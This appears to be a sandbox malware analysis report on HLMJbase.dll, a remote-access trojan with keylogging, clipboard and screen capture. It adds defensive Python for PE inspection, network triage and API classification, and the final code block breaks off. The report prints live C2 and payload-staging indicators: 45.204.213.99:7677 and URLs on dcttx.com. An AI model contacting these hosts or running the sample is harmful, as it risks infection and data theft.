Windows Analysis Report
HLMJbase.dll

Overview

General Information

Sample name: HLMJbase.dll
Analysis ID: 1579416
MD5: 250eb1ef1645f13252ef13c14ba66d51
SHA1: 4aa14d113af1d74fbd1adbc16c10126b69878d0b
SHA256: dacdac1e333a1f45700e3707e617ff49c457226604f1ffa160fc3faf9b6810b3
Tags: dll, user-smica83

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6972 cmdline: loaddll32.exe "C:\Users\user\Desktop\HLMJbase.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7116 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6156 cmdline: rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6204 cmdline: rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1900 cmdline: rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablement MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
The three rundll32.exe instances are the sandbox's own loaders (ordinal #1 and the NvOptimusEnablement export, invoked with and without quotes around the path). The network, capture and injection behaviour reported below is attributed to rundll32.exe only because it hosts the DLL; on a real victim the host process is whatever loads HLMJbase.dll, so detections keyed on rundll32.exe alone will miss other loaders.
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T09:29:07.990203+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 45.204.213.99 | 7677 | TCP
2024-12-22T09:30:23.404849+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 45.204.213.99 | 7677 | TCP
2024-12-22T09:31:35.424214+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 45.204.213.99 | 7677 | TCP


AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CC3E8E0 EncryptMessage,3_2_6CC3E8E0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CC10332 DecryptMessage,3_2_6CC10332
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CC39840 DecryptMessage,memset,3_2_6CC39840
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CC3961E EncryptMessage,3_2_6CC3961E
Source: HLMJbase.dll | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: unknown | HTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4, local ports 49730, 49731, 49732, 49733, 49734, 49735, version: TLS 1.2 (six sessions)
Source: HLMJbase.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: HLMJbase.pdb | found in: rundll32.exe, 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp; rundll32.exe, 00000004.00000002.3546373145.000000006CC66000.00000002.00000001.01000000.00000003.sdmp; rundll32.exe, 00000005.00000002.3546252526.000000006CC66000.00000002.00000001.01000000.00000003.sdmp; HLMJbase.dll (also present in the DLL on disk, so it is usable as a static indicator)
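The two "Static PE information" entries, the export names rundll32.exe is invoked with (#1 and NvOptimusEnablement) and the hashes in General Information can all be re-derived from the file itself before trusting a report. The following pure-stdlib Python is an added example written for this page, not Joe Sandbox code: it reads the FILE_HEADER and OPTIONAL_HEADER flag words, walks the export name table and hashes the input. Because the sample cannot ship with the page, build_minimal_dll() constructs a tiny PE32 DLL with the same flags and an NvOptimusEnablement export as a stand-in; that constructed file, and the choice to leave the debug directory (PDB path) unparsed, are this example's assumptions. The name NvOptimusEnablement is borrowed from a well-known benign export (the DWORD applications export to request the discrete NVIDIA GPU), which is worth keeping in mind when hunting for rundll32 command lines.

```python
"""Static checks on a PE file: hashes, header flags and export names.

Added example for this page (not Joe Sandbox code). pe_summary() works on any
PE32/PE32+ image; build_minimal_dll() is a constructed stand-in for the sample.
"""
import hashlib
import struct

# IMAGE_FILE_HEADER.Characteristics bits the report names.
FILE_CHARS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
              0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits the report names.
DLL_CHARS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT"}
MACHINES = {0x14C: "I386", 0x8664: "AMD64"}


def _flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def digests(data):
    """MD5/SHA1/SHA256 of the bytes, to compare with the report's General Information."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def pe_summary(data):
    """Return machine, header flags and exported names of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    fh = e_lfanew + 4                                          # IMAGE_FILE_HEADER
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                              # IMAGE_OPTIONAL_HEADER
    pe32plus = struct.unpack_from("<H", data, opt)[0] == 0x20B
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]    # same offset in PE32/PE32+
    export_rva = struct.unpack_from("<I", data, opt + (112 if pe32plus else 96))[0]
    # Section table (VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)
    # is needed to turn RVAs into file offsets.
    sections = [struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)[1:]
                for i in range(nsect)]

    def rva2off(rva):
        for vsize, va, rawsize, rawptr in sections:
            if va <= rva < va + max(vsize, rawsize):
                return rva - va + rawptr
        raise ValueError("RVA %#x not in any section" % rva)

    exports = []
    if export_rva:
        ed = rva2off(export_rva)                               # IMAGE_EXPORT_DIRECTORY
        nnames, = struct.unpack_from("<I", data, ed + 24)
        names_tbl = rva2off(struct.unpack_from("<I", data, ed + 32)[0])
        for i in range(nnames):
            p = rva2off(struct.unpack_from("<I", data, names_tbl + 4 * i)[0])
            exports.append(data[p:data.index(b"\0", p)].decode("ascii", "replace"))
    return {"machine": MACHINES.get(machine, hex(machine)), "pe32plus": pe32plus,
            "characteristics": _flags(chars, FILE_CHARS),
            "dll_characteristics": _flags(dll_chars, DLL_CHARS), "exports": exports}


def build_minimal_dll(export_names=("NvOptimusEnablement",)):
    """Constructed PE32 DLL with only an export table (NOT the analysed sample)."""
    sec_rva, sec_raw = 0x1000, 0x200
    n = len(export_names)
    body = bytearray(40)                                       # export directory, filled below
    funcs_rva = sec_rva + len(body)
    body += b"".join(struct.pack("<I", 0x1100 + i) for i in range(n))   # dummy function RVAs
    names_rva, names_pos = sec_rva + len(body), len(body)
    body += bytes(4 * n)                                       # name-pointer table, filled below
    ords_rva = sec_rva + len(body)
    body += b"".join(struct.pack("<H", i) for i in range(n))
    for i, name in enumerate(export_names):
        struct.pack_into("<I", body, names_pos + 4 * i, sec_rva + len(body))
        body += name.encode() + b"\0"
    struct.pack_into("<IIHHIIIIIII", body, 0, 0, 0, 0, 0, 0, 1, n, n,
                     funcs_rva, names_rva, ords_rva)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2122)  # i386, 1 section, flags as in report
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<H", opt, 70, 0x0140)                    # DYNAMIC_BASE | NX_COMPAT
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96, sec_rva, len(body))       # export data directory
    sect = struct.pack("<8sIIIIIIHHI", b".edata", len(body), sec_rva, sec_raw, sec_raw,
                       0, 0, 0, 0, 0x40000040)
    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sect
    return headers.ljust(sec_raw, b"\0") + bytes(body).ljust(sec_raw, b"\0")


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_dll()
    print(digests(blob))
    print(pe_summary(blob))
```

Run it with the sample path as the only argument; the SHA256 must match dacdac1e333a1f45700e3707e617ff49c457226604f1ffa160fc3faf9b6810b3 and the flag lists must match the two static-PE entries above before any further conclusions are drawn from this report.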
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: b:, e:, f:, g:, h:, i:, j:, k:, l:, m:, n:, o:, p:, q:, r:, s:, t:, u:, v:, w:, x:, y:, z: and "[:" (the report lists them as two interleaved descending runs, z, x, v, ... b and y, w, u, ... e, [; "[" is the ASCII character after "Z", which suggests the drive-letter loop runs one past Z)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB8060 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_04DB8060

Networking

Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin: 192.168.2.4:49736 -> 45.204.213.99:7677 (the same alert fired again from local ports 49739 and 49740; see the alert table above)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 38.147.186.138 443
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.204.213.99 7677
Source: global traffic | TCP traffic: 192.168.2.4:49736 -> 45.204.213.99:7677
Source: global traffic | HTTP traffic detected: GET /19/7.txt HTTP/1.1, accept: */*, host: dcttx.com (three identical requests; no User-Agent header)
Source: global traffic | HTTP traffic detected: GET /19/77.bin HTTP/1.1, accept: */*, host: dcttx.com (three identical requests; no User-Agent header)
Source: Joe Sandbox View | ASN Name: CODECCLOUD-AS-AP CodecCloud HK Limited, HK
Source: Joe Sandbox View | ASN Name: ITACE-AS-AP Itace International Limited, HK
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 45.204.213.99 (reported 50 times)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04203340 recv,timeGetTime,_memmove,3_2_04203340
Source: global traffic | DNS traffic detected: DNS query: dcttx.com
Source: rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dcttx.com/19/7.txt
Source: rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dcttx.com/19/7.txt)
Source: rundll32.exe, rundll32.exe, 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3546373145.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.3546252526.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dll | String found in binary or memory: https://dcttx.com/19/7.txtFailed (this one is in the DLL image and in the file on disk, so the first-stage URL is hard-coded in the sample)
Source: rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2157580790.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3543030625.000000000287A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2339917557.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3542816522.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1794106955.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1976663029.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699722110.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166846758.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1802814248.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3542903898.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723632245.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dcttx.com/19/77.bin (heap dumps only, not the DLL image: the second-stage URL is presumably obtained from 7.txt at run time)
Source: rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dcttx.com/19/77.bin) and https://dcttx.com/19/77.bin3
Source: rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dcttx.com/19/77.bin.
Source: rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166846758.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1802814248.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3542903898.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dcttx.com/19/77.bin8
Source: rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dcttx.com/19/77.binA, https://dcttx.com/19/77.binD, https://dcttx.com/19/77.bin_ and https://dcttx.com/19/77.binf (the trailing character in each variant is presumably whatever byte follows the URL in memory; the indicator is the URL itself)
Source: unknown | Network traffic detected: HTTP traffic between port 443 and local ports 49730, 49731, 49732, 49733, 49734, 49735 (both directions)
Taken together: dcttx.com is the only name resolved and 38.147.186.138:443 the only TLS peer, so the six no-User-Agent GETs for /19/7.txt and /19/77.bin most likely ran inside those six TLS 1.2 sessions (the URLs recovered from memory are https://). 45.204.213.99:7677 is contacted repeatedly with no DNS lookup at all, i.e. the check-in address is embedded rather than resolved, which makes that IP:port pair and Suricata SID 2052875 the most durable network indicators on this page; the dcttx.com staging host can be rotated without touching the RAT.
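The entries above contain the whole network picture: a DNS query for dcttx.com, six TLS 1.2 sessions to 38.147.186.138:443 carrying GETs for /19/7.txt and /19/77.bin with no User-Agent, and a direct TCP check-in to 45.204.213.99:7677 that no DNS query precedes. The Python below is an added example, not part of the Joe Sandbox report, that turns those observations into detection logic and runs it over constructed log records. The record format, the DNS answer mapping dcttx.com to 38.147.186.138 (the report shows only the query) and the benign example.org traffic are assumptions made for the demonstration; the indicator values are copied from the report.

```python
"""Network triage for the indicators in this report.

Added example (not Joe Sandbox output). Replays constructed records of the
form "kind key=value ..." and raises the kinds of findings the sandbox did:
known C2 endpoint, JA3 seen with other malware, TCP connect to an address no
DNS answer returned, non-standard destination port, known staging URL, and
an HTTP request without a User-Agent header.
"""
import ipaddress
import shlex
from dataclasses import dataclass

# Indicators lifted from the report above.
C2_ENDPOINTS = {("45.204.213.99", 7677)}       # ET 2052875 "Anonymous RAT CnC Checkin"
C2_JA3 = {"3b5074b1b5d032e5620f69f9f700ff0e"}
STAGING_URLS = {"dcttx.com/19/7.txt", "dcttx.com/19/77.bin"}
COMMON_PORTS = {53, 80, 443}


@dataclass
class Finding:
    rule: str
    severity: str
    record: str


def parse_record(line):
    """'conn src=a dst=b ua="x y"' -> ('conn', {'src': 'a', ...}); quotes are honoured."""
    kind, *tokens = shlex.split(line)
    return kind, dict(tok.partition("=")[::2] for tok in tokens)


def triage(lines):
    resolved = set()          # every address some DNS answer has returned so far
    findings = []
    for line in lines:
        if not line.strip():
            continue
        kind, f = parse_record(line)
        if kind == "dns":
            resolved.add(f["answer"])
        elif kind == "conn":
            dst, dport = f["dst"], int(f["dport"])
            hits = []
            if (dst, dport) in C2_ENDPOINTS:
                hits.append(("c2_endpoint", "high"))
            if f.get("ja3") in C2_JA3:
                hits.append(("c2_ja3", "medium"))
            # Direct-to-IP connects only mean something for global addresses, and
            # only if the capture started before the host's DNS cache was warm.
            if ipaddress.ip_address(dst).is_global and dst not in resolved:
                hits.append(("no_dns", "medium"))
            if dport not in COMMON_PORTS:
                hits.append(("odd_port", "low"))
            findings += [Finding(rule, sev, line) for rule, sev in hits]
        elif kind == "http":
            if f["host"] + f["uri"] in STAGING_URLS:
                findings.append(Finding("c2_url", "high", line))
            if not f.get("ua"):
                findings.append(Finding("no_user_agent", "medium", line))
    return findings


def summarize(lines):
    """Ordered list of the rule names that fired."""
    return [f.rule for f in triage(lines)]


# Constructed records modelled on the report's traffic (not a real capture);
# the dcttx.com answer and the example.org lines are assumptions.
SAMPLE_LOG = """\
dns  ts=1 qname=dcttx.com answer=38.147.186.138
conn ts=2 src=192.168.2.4 sport=49730 dst=38.147.186.138 dport=443 proto=tcp ja3=3b5074b1b5d032e5620f69f9f700ff0e
http ts=2 host=dcttx.com method=GET uri=/19/7.txt
conn ts=3 src=192.168.2.4 sport=49736 dst=45.204.213.99 dport=7677 proto=tcp
dns  ts=4 qname=example.org answer=203.0.113.10
conn ts=5 src=192.168.2.4 sport=49800 dst=203.0.113.10 dport=443 proto=tcp ja3=0123456789abcdef0123456789abcdef
http ts=5 host=example.org method=GET uri=/ ua="Mozilla/5.0 (Windows NT 10.0)"
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG.splitlines()):
        print(f"[{f.severity:6}] {f.rule:14} {f.record}")
```

Running it yields six findings on the constructed records: the JA3 match on the TLS session, URL and missing-User-Agent on the 7.txt request, and endpoint, no-DNS and odd-port on the check-in. Treat no_dns as corroborating rather than conclusive (it depends on the capture starting before the resolver cache was populated) and anchor any production rule on the IP:port pair together with Suricata SID 2052875.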

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: [esc] 3_2_04DBE7B0 (listed 4 times), [esc] 4_2_055AE7B0 (listed 4 times), [esc] 5_2_0535E7B0 (listed 4 times)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DBE7B0 CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_04DBE7B0 (clipboard contents and key state are formatted and appended to a file under a mutex)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DBBBF0 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_04DBBBF0 (full-desktop screenshot via StretchBlt/GetDIBits)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DBE450 CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_04DBE450 (log file under a SHGetFolderPathW-derived path; DirectInput8 initialised for key capture)
Source: C:\Windows\SysWOW64\rundll32.exe | Windows user hook set: 0 mouse low level C:\Windows\System32\DINPUT8.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CBF4854 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,GetLastError,CloseHandle,3_2_6CBF4854
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CBF4268 NtDeviceIoControlFile,RtlNtStatusToDosError,3_2_6CBF4268
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CBC3942 SetThreadErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,memmove,memmove,memmove,memmove,GetCurrentProcess,NtAllocateVirtualMemory,memmove,GetCurrentProcess,NtCreateThreadEx,GetCurrentProcess,FreeLibrary,CreateWaitableTimerExW,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,CloseHandle,Sleep,3_2_6CBC3942 (GetCurrentProcess precedes both NtAllocateVirtualMemory and NtCreateThreadEx, so as listed the allocation and thread creation target the calling process, i.e. staging code in-process rather than injecting into another one; the Nt* names are resolved through GetProcAddress)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CC483D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,3_2_6CC483D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CBF3EDC NtCancelIoFileEx,RtlNtStatusToDosError,3_2_6CBF3EDC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ExitWindowsEx in 3_2_04DBB3D0, 3_2_04DBB3F4, 3_2_04DBB3AC, 4_2_055AB3D0, 4_2_055AB3F4, 4_2_055AB3AC, 5_2_0535B3AC, 5_2_0535B3F4, 5_2_0535B3D0 (three small wrappers, present in each of the three rundll32.exe processes)
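Each "Code function" entry is a function address followed by the Windows APIs the sandbox resolved inside it, and the capability signatures in the overview (clipboard, keystrokes, screenshots, drive enumeration, native thread creation, shutdown) are derived from such lists. The Python below is an added example, not Joe Sandbox code: it parses lines in exactly the form shown on this page and maps each function's API set to a capability label. The rule table is this editor's reading of the sequences listed above, not the sandbox's signature logic, and the sample input is a copy of nine entries from this page plus one "[esc]" line to show that entries without an API list are skipped.

```python
"""Turn the report's "Code function:" API lists into capability labels.

Added example for this page, not Joe Sandbox code. Parses entries in the
exact form shown on the page (function id, comma-separated APIs, function id
again) and matches each function's API set against editor-derived rules.
"""
import re

FUNC_RE = re.compile(
    r"Code function:\s*(?P<id>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<apis>.*?)[, ]*(?P=id)\s*$"
)

# A rule fires when the function's API set contains every name of at least one
# alternative. Sets are taken from the API sequences in this report; the
# NtAllocateVirtualMemory/NtCreateThreadEx rule deliberately does not claim a
# remote target, because the listed call order uses GetCurrentProcess.
RULES = [
    ("drive enumeration", [{"GetLogicalDriveStringsW", "QueryDosDeviceW"}]),
    ("clipboard capture", [{"OpenClipboard", "GetClipboardData"}]),
    ("keystroke capture", [{"DirectInput8Create", "GetKeyState"},
                           {"GetKeyState", "WriteFile"}]),
    ("screen capture", [{"GetDesktopWindow", "CreateCompatibleBitmap", "GetDIBits"}]),
    ("native alloc + thread", [{"NtAllocateVirtualMemory", "NtCreateThreadEx"}]),
    ("device driver I/O", [{"NtDeviceIoControlFile"}]),
    ("shutdown/reboot", [{"ExitWindowsEx"}]),
    ("SSPI message crypto", [{"EncryptMessage"}, {"DecryptMessage"}]),
]


def parse_code_function(line):
    """Return (function_id, [api, ...]) or None when the line is not a parsable entry."""
    m = FUNC_RE.search(line)
    if not m:
        return None
    apis = [a.strip(" :") for a in m["apis"].split(",")]
    return m["id"], [a for a in apis if a]


def capabilities(apis):
    present = set(apis)
    return [name for name, alts in RULES if any(alt <= present for alt in alts)]


def classify(lines):
    """function id -> {'apis': [...], 'capabilities': [...]}; duplicate entries merge."""
    out = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed:
            fid, apis = parsed
            out[fid] = {"apis": apis, "capabilities": capabilities(apis)}
    return out


def by_capability(results):
    """Invert classify() output: capability -> [function ids] in input order."""
    table = {}
    for fid, info in results.items():
        for cap in info["capabilities"]:
            table.setdefault(cap, []).append(fid)
    return table


# Entries copied from this report; the "[esc]" line carries no API list.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB8060 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_04DB8060
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBE7B0 CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_04DBE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBBBF0 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_04DBBBF0
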